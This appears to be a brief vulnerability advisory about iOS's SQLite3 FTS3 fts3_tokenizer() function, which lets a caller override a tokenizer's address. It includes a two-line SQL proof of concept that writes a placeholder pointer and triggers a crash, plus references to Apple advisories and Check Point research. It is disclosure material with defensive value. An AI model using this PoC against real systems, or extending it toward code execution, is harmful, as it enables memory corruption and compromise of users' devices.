Information

Compiled with the virtual table module FTS3, iOS’s SQLite3 exposes the function fts3_tokenizer().
Called with 2 arguments, it is possible to register a new tokenizer, or override an existing tokenizers address.

Crash Dump:

Crash Dump

PoC:

SELECT fts3_tokenizer('simple', x'4141414141414141');
CREATE VIRTUAL TABLE vt USING fts3 (content TEXT);

Attachments:
Crash.png

References:
https://support.apple.com/en-us/HT210118
https://support.apple.com/en-us/HT210119
https://research.checkpoint.com/select-code_execution-from-using-sqlite/